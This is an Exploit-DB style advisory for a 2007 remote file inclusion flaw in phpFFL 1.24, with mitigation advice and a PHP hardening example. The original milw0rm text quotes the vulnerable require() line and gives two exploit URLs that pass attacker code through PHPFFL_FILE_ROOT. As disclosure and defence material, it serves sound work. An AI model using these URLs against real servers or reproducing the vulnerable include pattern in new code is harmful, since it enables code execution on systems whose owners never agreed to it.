Vendor: phpFFL
By: Dj7xpl
N/A
CVSS: MEDIUM
Vulnerability type: Remote File Inclusion
CWE: 98
Product Name: phpFFL
Affected Version From: 1.24
Affected Version To: 1.24
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

phpFFL 1.24 Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to include arbitrary files via a crafted PHPFFL_FILE_ROOT parameter in the livedraft.php and admin.php scripts, because both scripts pass that value straight into require() without validation.

Mitigation:

Update to a patched version of phpFFL, or validate the PHPFFL_FILE_ROOT value before it reaches require() so that remote file inclusion is not possible.
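As an added illustration (not phpFFL's own code and not part of the advisory), the include pattern quoted in the raw data is shown beside a hardened form in which the root path is derived on the server and every include is checked to resolve inside the application tree. It assumes the script lives under phpffl_webfiles/program_files/livedraft/ as the advisory's URLs show, and the helper phpffl_safe_require is hypothetical.

```php
<?php
// Added example: the vulnerable include pattern from the advisory beside a
// hardened form. Not phpFFL code; phpffl_safe_require is a hypothetical helper.

// --- Vulnerable pattern (as quoted in the advisory) ---
// With register_globals enabled (on by default in PHP 4, removed in PHP 5.4), a
// request parameter named PHPFFL_FILE_ROOT becomes the variable
// $PHPFFL_FILE_ROOT before this line runs, and require() loads whatever path
// or URL it holds (remote URLs when allow_url_include/allow_url_fopen permit).
//
//     require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");

// --- Hardened form ---
// 1. Derive the root from the script's own location, never from the request.
//    Assumption: this file sits in phpffl_webfiles/program_files/livedraft/,
//    so the application root is two directories up.
define('PHPFFL_FILE_ROOT', realpath(dirname(__FILE__) . '/../..') . '/');

// 2. Defence in depth: a client that supplies PHPFFL_FILE_ROOT at all is
//    probing for this bug, so refuse the request and leave a log line for
//    detection even though the constant above no longer depends on it.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (isset($source['PHPFFL_FILE_ROOT'])) {
        error_log('phpFFL: client-supplied PHPFFL_FILE_ROOT rejected from '
            . $_SERVER['REMOTE_ADDR']);
        header('HTTP/1.1 400 Bad Request');
        exit('PHPFFL_FILE_ROOT must not be supplied by the client.');
    }
}

// 3. Resolve the include target and verify it stays under the root.
function phpffl_safe_require($relative) {
    $root   = realpath(PHPFFL_FILE_ROOT);
    $target = realpath(PHPFFL_FILE_ROOT . $relative);
    // realpath() returns false for URLs and missing files; the prefix test
    // stops ../ traversal out of the application tree.
    if ($root === false || $target === false
        || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        error_log('phpFFL: refused include of ' . $relative);
        exit('Invalid include path.');
    }
    require $target;
}

phpffl_safe_require('program_files/livedraft/sajax.php');
```

On top of the code change, the deployment-side settings that close this whole bug class are register_globals=Off (the default from PHP 4.2 and gone entirely in 5.4) and allow_url_include=Off (available from PHP 5.2); with those set, a request parameter can no longer become a PHP variable and require() can no longer fetch code over HTTP.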

Exploit-DB raw data:

*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
# Author   :  Dj7xpl
# Contact  :  Dj7xpl@r00t.ir
# Download :  http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ   :  Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
 

[[Remote]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""

# milw0rm.com [2007-09-14]